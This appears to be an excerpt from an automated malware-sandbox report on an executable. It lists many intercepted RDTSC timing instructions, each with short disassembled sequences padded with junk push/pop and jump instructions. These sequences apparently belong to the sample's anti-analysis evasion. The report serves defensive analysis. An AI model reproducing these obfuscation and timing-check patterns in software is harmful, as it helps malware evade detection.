Source: C:\Users\user\Desktop\HZhObFuFNe.exeRDTSC instruction interceptor: First address: 1545F14 second address: 1545F19 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\HZhObFuFNe.exeRDTSC instruction interceptor: First address: 14DE453 second address: 14DE457 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\HZhObFuFNe.exeRDTSC instruction interceptor: First address: 1545599 second address: 154559D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\HZhObFuFNe.exeRDTSC instruction interceptor: First address: 154559D second address: 15455C1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F6FA52293C8h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pushad 0x0000000c push esi 0x0000000d pop esi 0x0000000e push ecx 0x0000000f pop ecx 0x00000010 popad 0x00000011 rdtsc
Source: C:\Users\user\Desktop\HZhObFuFNe.exeRDTSC instruction interceptor: First address: 15455C1 second address: 15455FF instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 jo 00007F6FA4524816h 0x00000009 pushad 0x0000000a popad 0x0000000b pop ecx 0x0000000c pushad 0x0000000d jns 00007F6FA4524816h 0x00000013 pushad 0x00000014 popad 0x00000015 jng 00007F6FA4524816h 0x0000001b jmp 00007F6FA4524827h 0x00000020 popad 0x00000021 pop edx 0x00000022 pop eax 0x00000023 pushad 0x00000024 push eax 0x00000025 push edx 0x00000026 je 00007F6FA4524816h 0x0000002c rdtsc
Source: C:\Users\user\Desktop\HZhObFuFNe.exeRDTSC instruction interceptor: First address: 15455FF second address: 1545603 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\HZhObFuFNe.exeRDTSC instruction interceptor: First address: 1545756 second address: 1545775 instructions: 0x00000000 rdtsc 0x00000002 je 00007F6FA4524816h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F6FA452481Fh 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\HZhObFuFNe.exeRDTSC instruction interceptor: First address: 1545775 second address: 1545779 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\HZhObFuFNe.exeRDTSC instruction interceptor: First address: 15458E4 second address: 15458EE instructions: 0x00000000 rdtsc 0x00000002 ja 00007F6FA4524816h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\HZhObFuFNe.exeRDTSC instruction interceptor: First address: 1549CAD second address: 1549CB2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\HZhObFuFNe.exeRDTSC instruction interceptor: First address: 1549CFC second address: 1549D06 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F6FA4524816h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\HZhObFuFNe.exeRDTSC instruction interceptor: First address: 1549D06 second address: 1549D10 instructions: 0x00000000 rdtsc 0x00000002 jp 00007F6FA52293BCh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\HZhObFuFNe.exeRDTSC instruction interceptor: First address: 154FA2A second address: 154FA30 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\HZhObFuFNe.exeRDTSC instruction interceptor: First address: 154FA30 second address: 154FA55 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F6FA52293BAh 0x00000009 popad 0x0000000a jmp 00007F6FA52293C6h 0x0000000f rdtsc
Source: C:\Users\user\Desktop\HZhObFuFNe.exeRDTSC instruction interceptor: First address: 154FA55 second address: 154FA5A instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\HZhObFuFNe.exeRDTSC instruction interceptor: First address: 154EE26 second address: 154EE41 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F6FA52293BBh 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d jl 00007F6FA52293B6h 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\HZhObFuFNe.exeRDTSC instruction interceptor: First address: 154EE41 second address: 154EE47 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\HZhObFuFNe.exeRDTSC instruction interceptor: First address: 154EE47 second address: 154EE4C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\HZhObFuFNe.exeRDTSC instruction interceptor: First address: 154F13C second address: 154F144 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\HZhObFuFNe.exeRDTSC instruction interceptor: First address: 154F3F6 second address: 154F409 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 jmp 00007F6FA52293BBh 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\HZhObFuFNe.exeRDTSC instruction interceptor: First address: 154F409 second address: 154F41D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 je 00007F6FA4524818h 0x0000000b popad 0x0000000c push eax 0x0000000d push edx 0x0000000e push ecx 0x0000000f pushad 0x00000010 popad 0x00000011 pop ecx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\HZhObFuFNe.exeRDTSC instruction interceptor: First address: 154F576 second address: 154F57C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\HZhObFuFNe.exeRDTSC instruction interceptor: First address: 1554E2F second address: 1554E33 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\HZhObFuFNe.exeRDTSC instruction interceptor: First address: 1554E33 second address: 1554E39 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\HZhObFuFNe.exeRDTSC instruction interceptor: First address: 1554E39 second address: 1554E5A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007F6FA4524829h 0x0000000d rdtsc
Source: C:\Users\user\Desktop\HZhObFuFNe.exeRDTSC instruction interceptor: First address: 1554E5A second address: 1554E6F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6FA52293C1h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\HZhObFuFNe.exeRDTSC instruction interceptor: First address: 1554E6F second address: 1554E75 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\HZhObFuFNe.exeRDTSC instruction interceptor: First address: 1554E75 second address: 1554E89 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push esi 0x00000004 pop esi 0x00000005 pop ecx 0x00000006 push eax 0x00000007 push edx 0x00000008 jo 00007F6FA52293B6h 0x0000000e jns 00007F6FA52293B6h 0x00000014 rdtsc
Source: C:\Users\user\Desktop\HZhObFuFNe.exeRDTSC instruction interceptor: First address: 1554E89 second address: 1554E8D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\HZhObFuFNe.exeRDTSC instruction interceptor: First address: 155414F second address: 155415F instructions: 0x00000000 rdtsc 0x00000002 jg 00007F6FA52293B6h 0x00000008 jg 00007F6FA52293B6h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 rdtsc
Source: C:\Users\user\Desktop\HZhObFuFNe.exeRDTSC instruction interceptor: First address: 15542FA second address: 155430D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jp 00007F6FA4524816h 0x00000009 pushad 0x0000000a popad 0x0000000b jnp 00007F6FA4524816h 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\HZhObFuFNe.exeRDTSC instruction interceptor: First address: 1554599 second address: 15545A6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 jng 00007F6FA52293B6h 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\HZhObFuFNe.exeRDTSC instruction interceptor: First address: 1554B1C second address: 1554B26 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push edi 0x00000009 pop edi 0x0000000a rdtsc
Source: C:\Users\user\Desktop\HZhObFuFNe.exeRDTSC instruction interceptor: First address: 1554B26 second address: 1554B2C instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\HZhObFuFNe.exeRDTSC instruction interceptor: First address: 1554B2C second address: 1554B51 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jng 00007F6FA452481Eh 0x0000000c popad 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007F6FA452481Eh 0x00000014 rdtsc
Source: C:\Users\user\Desktop\HZhObFuFNe.exeRDTSC instruction interceptor: First address: 1554B51 second address: 1554B75 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F6FA52293BBh 0x00000009 jmp 00007F6FA52293C5h 0x0000000e rdtsc
Source: C:\Users\user\Desktop\HZhObFuFNe.exeRDTSC instruction interceptor: First address: 1557F75 second address: 1557FA5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007F6FA4524829h 0x0000000c jmp 00007F6FA4524820h 0x00000011 rdtsc
Source: C:\Users\user\Desktop\HZhObFuFNe.exeRDTSC instruction interceptor: First address: 1557FA5 second address: 1557FAB instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\HZhObFuFNe.exeRDTSC instruction interceptor: First address: 1557FAB second address: 1557FB6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 pushad 0x00000008 popad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\HZhObFuFNe.exeRDTSC instruction interceptor: First address: 1557FB6 second address: 1557FBC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\HZhObFuFNe.exeRDTSC instruction interceptor: First address: 1520948 second address: 152094E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\HZhObFuFNe.exeRDTSC instruction interceptor: First address: 15209D7 second address: 15209DD instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\HZhObFuFNe.exeRDTSC instruction interceptor: First address: 1520AC7 second address: 1520AD7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6FA452481Ch 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\HZhObFuFNe.exeRDTSC instruction interceptor: First address: 1520AD7 second address: 1520AE8 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push edi 0x00000004 pop edi 0x00000005 pop edx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov eax, dword ptr [esp+04h] 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\HZhObFuFNe.exeRDTSC instruction interceptor: First address: 1520AE8 second address: 1520AEC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\HZhObFuFNe.exeRDTSC instruction interceptor: First address: 1520AEC second address: 1520B3C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6FA52293C9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jmp 00007F6FA52293C4h 0x0000000e popad 0x0000000f mov eax, dword ptr [eax] 0x00000011 push edx 0x00000012 jng 00007F6FA52293B8h 0x00000018 push edi 0x00000019 pop edi 0x0000001a pop edx 0x0000001b mov dword ptr [esp+04h], eax 0x0000001f push eax 0x00000020 push edx 0x00000021 jns 00007F6FA52293BCh 0x00000027 rdtsc
Source: C:\Users\user\Desktop\HZhObFuFNe.exeRDTSC instruction interceptor: First address: 1520B3C second address: 1520B42 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\HZhObFuFNe.exeRDTSC instruction interceptor: First address: 1521289 second address: 152128D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\HZhObFuFNe.exeRDTSC instruction interceptor: First address: 1521588 second address: 152158E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\HZhObFuFNe.exeRDTSC instruction interceptor: First address: 152158E second address: 1521594 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
Source: C:\Users\user\Desktop\HZhObFuFNe.exeRDTSC instruction interceptor: First address: 1521594 second address: 1521598 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\HZhObFuFNe.exeRDTSC instruction interceptor: First address: 1521598 second address: 1508323 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esp], eax 0x0000000b call 00007F6FA52293C5h 0x00000010 xor edi, 1B503119h 0x00000016 pop edx 0x00000017 lea eax, dword ptr [ebp+12487EDDh] 0x0000001d sub dword ptr [ebp+122D1D2Ch], esi 0x00000023 mov edi, 3571D8E2h 0x00000028 push eax 0x00000029 push edi 0x0000002a push eax 0x0000002b pushad 0x0000002c popad 0x0000002d pop eax 0x0000002e pop edi 0x0000002f mov dword ptr [esp], eax 0x00000032 push 00000000h 0x00000034 push ecx 0x00000035 call 00007F6FA52293B8h 0x0000003a pop ecx 0x0000003b mov dword ptr [esp+04h], ecx 0x0000003f add dword ptr [esp+04h], 0000001Ch 0x00000047 inc ecx 0x00000048 push ecx 0x00000049 ret 0x0000004a pop ecx 0x0000004b ret 0x0000004c js 00007F6FA52293BCh 0x00000052 mov dword ptr [ebp+122D3013h], ecx 0x00000058 call dword ptr [ebp+122D1DF2h] 0x0000005e jo 00007F6FA52293C4h 0x00000064 push eax 0x00000065 push edx 0x00000066 jnl 00007F6FA52293B6h 0x0000006c rdtsc
Source: C:\Users\user\Desktop\HZhObFuFNe.exeRDTSC instruction interceptor: First address: 1558227 second address: 155822D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\HZhObFuFNe.exeRDTSC instruction interceptor: First address: 155822D second address: 1558239 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 je 00007F6FA52293B6h 0x0000000c rdtsc
Source: C:\Users\user\Desktop\HZhObFuFNe.exeRDTSC instruction interceptor: First address: 1558239 second address: 155823D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\HZhObFuFNe.exeRDTSC instruction interceptor: First address: 155866F second address: 1558688 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jg 00007F6FA52293B6h 0x0000000a jnl 00007F6FA52293B6h 0x00000010 popad 0x00000011 push eax 0x00000012 push edx 0x00000013 jns 00007F6FA52293B6h 0x00000019 rdtsc
Source: C:\Users\user\Desktop\HZhObFuFNe.exeRDTSC instruction interceptor: First address: 15588D5 second address: 15588E1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push edi 0x00000005 pop edi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push esi 0x00000009 push edi 0x0000000a pop edi 0x0000000b pop esi 0x0000000c rdtsc
Source: C:\Users\user\Desktop\HZhObFuFNe.exeRDTSC instruction interceptor: First address: 15588E1 second address: 15588E8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push ecx 0x00000004 pop ecx 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\HZhObFuFNe.exeRDTSC instruction interceptor: First address: 155C867 second address: 155C86C instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\HZhObFuFNe.exeRDTSC instruction interceptor: First address: 155C86C second address: 155C877 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\HZhObFuFNe.exeRDTSC instruction interceptor: First address: 155C877 second address: 155C87F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\HZhObFuFNe.exeRDTSC instruction interceptor: First address: 14D4516 second address: 14D4520 instructions: 0x00000000 rdtsc 0x00000002 jl 00007F6FA52293B6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\HZhObFuFNe.exeRDTSC instruction interceptor: First address: 1560746 second address: 156074B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\HZhObFuFNe.exeRDTSC instruction interceptor: First address: 156074B second address: 1560751 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\HZhObFuFNe.exeRDTSC instruction interceptor: First address: 1560751 second address: 156075B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnl 00007F6FA4524816h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\HZhObFuFNe.exeRDTSC instruction interceptor: First address: 1565D7B second address: 1565D9C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 pop eax 0x00000008 popad 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c je 00007F6FA52293B6h 0x00000012 jmp 00007F6FA52293BAh 0x00000017 popad 0x00000018 push edi 0x00000019 push edx 0x0000001a pop edx 0x0000001b pop edi 0x0000001c rdtsc
Source: C:\Users\user\Desktop\HZhObFuFNe.exeRDTSC instruction interceptor: First address: 1565D9C second address: 1565DB2 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F6FA452481Ch 0x00000008 je 00007F6FA452481Ch 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\HZhObFuFNe.exeRDTSC instruction interceptor: First address: 156513A second address: 1565164 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 jmp 00007F6FA52293BDh 0x0000000a pop ecx 0x0000000b pushad 0x0000000c push ecx 0x0000000d jmp 00007F6FA52293BEh 0x00000012 push ecx 0x00000013 pop ecx 0x00000014 pop ecx 0x00000015 push eax 0x00000016 push edx 0x00000017 push edx 0x00000018 pop edx 0x00000019 rdtsc
Source: C:\Users\user\Desktop\HZhObFuFNe.exeRDTSC instruction interceptor: First address: 1565164 second address: 1565181 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6FA452481Fh 0x00000007 jc 00007F6FA4524816h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push eax 0x00000010 push edx 0x00000011 push edx 0x00000012 pop edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\HZhObFuFNe.exeRDTSC instruction interceptor: First address: 156544B second address: 1565455 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jo 00007F6FA52293B6h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\HZhObFuFNe.exeRDTSC instruction interceptor: First address: 1565455 second address: 156545B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\HZhObFuFNe.exeRDTSC instruction interceptor: First address: 156545B second address: 156547C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007F6FA52293C9h 0x0000000d rdtsc
Source: C:\Users\user\Desktop\HZhObFuFNe.exeRDTSC instruction interceptor: First address: 156547C second address: 1565480 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\HZhObFuFNe.exeRDTSC instruction interceptor: First address: 1565480 second address: 1565486 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\HZhObFuFNe.exeRDTSC instruction interceptor: First address: 1564485 second address: 1564489 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\HZhObFuFNe.exeRDTSC instruction interceptor: First address: 156A111 second address: 156A122 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 push ebx 0x00000006 pop ebx 0x00000007 push ecx 0x00000008 pop ecx 0x00000009 push edi 0x0000000a pop edi 0x0000000b popad 0x0000000c popad 0x0000000d pushad 0x0000000e push eax 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\HZhObFuFNe.exeRDTSC instruction interceptor: First address: 156C768 second address: 156C76C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\HZhObFuFNe.exeRDTSC instruction interceptor: First address: 156C76C second address: 156C77A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6FA52293BAh 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\HZhObFuFNe.exeRDTSC instruction interceptor: First address: 156C324 second address: 156C34A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 jmp 00007F6FA4524825h 0x0000000b pushad 0x0000000c popad 0x0000000d popad 0x0000000e push eax 0x0000000f push edx 0x00000010 jl 00007F6FA4524816h 0x00000016 rdtsc
Source: C:\Users\user\Desktop\HZhObFuFNe.exeRDTSC instruction interceptor: First address: 1571E02 second address: 1571E08 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edi 0x00000005 pop edi 0x00000006 rdtsc
Source: C:\Users\user\Desktop\HZhObFuFNe.exeRDTSC instruction interceptor: First address: 1571E08 second address: 1571E23 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6FA452481Dh 0x00000007 js 00007F6FA4524816h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push eax 0x00000010 push edx 0x00000011 push edx 0x00000012 pop edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\HZhObFuFNe.exeRDTSC instruction interceptor: First address: 1571E23 second address: 1571E27 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\HZhObFuFNe.exeRDTSC instruction interceptor: First address: 1571E27 second address: 1571E45 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnl 00007F6FA4524816h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pop edx 0x0000000d pop eax 0x0000000e ja 00007F6FA4524850h 0x00000014 push eax 0x00000015 push edx 0x00000016 push esi 0x00000017 pop esi 0x00000018 jl 00007F6FA4524816h 0x0000001e rdtsc
Source: C:\Users\user\Desktop\HZhObFuFNe.exeRDTSC instruction interceptor: First address: 15711B1 second address: 15711E4 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 jc 00007F6FA52293B6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pushad 0x0000000d jp 00007F6FA52293B6h 0x00000013 push edx 0x00000014 pop edx 0x00000015 jmp 00007F6FA52293C7h 0x0000001a jng 00007F6FA52293B6h 0x00000020 popad 0x00000021 rdtsc
Source: C:\Users\user\Desktop\HZhObFuFNe.exeRDTSC instruction interceptor: First address: 15711E4 second address: 15711EB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\HZhObFuFNe.exeRDTSC instruction interceptor: First address: 157185E second address: 1571862 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\HZhObFuFNe.exeRDTSC instruction interceptor: First address: 1571862 second address: 1571868 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\HZhObFuFNe.exeRDTSC instruction interceptor: First address: 1571868 second address: 157188F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jns 00007F6FA52293B8h 0x0000000c push esi 0x0000000d jmp 00007F6FA52293C2h 0x00000012 push eax 0x00000013 push edx 0x00000014 pushad 0x00000015 popad 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
Source: C:\Users\user\Desktop\HZhObFuFNe.exeRDTSC instruction interceptor: First address: 157188F second address: 1571893 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\HZhObFuFNe.exeRDTSC instruction interceptor: First address: 1575E3C second address: 1575E40 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\HZhObFuFNe.exeRDTSC instruction interceptor: First address: 1575E40 second address: 1575E44 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\HZhObFuFNe.exeRDTSC instruction interceptor: First address: 157628E second address: 15762B6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 jmp 00007F6FA52293C2h 0x0000000c popad 0x0000000d push ebx 0x0000000e pushad 0x0000000f jl 00007F6FA52293B6h 0x00000015 pushad 0x00000016 popad 0x00000017 popad 0x00000018 pushad 0x00000019 push eax 0x0000001a push edx 0x0000001b rdtsc
Source: C:\Users\user\Desktop\HZhObFuFNe.exeRDTSC instruction interceptor: First address: 1520F02 second address: 1520F06 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
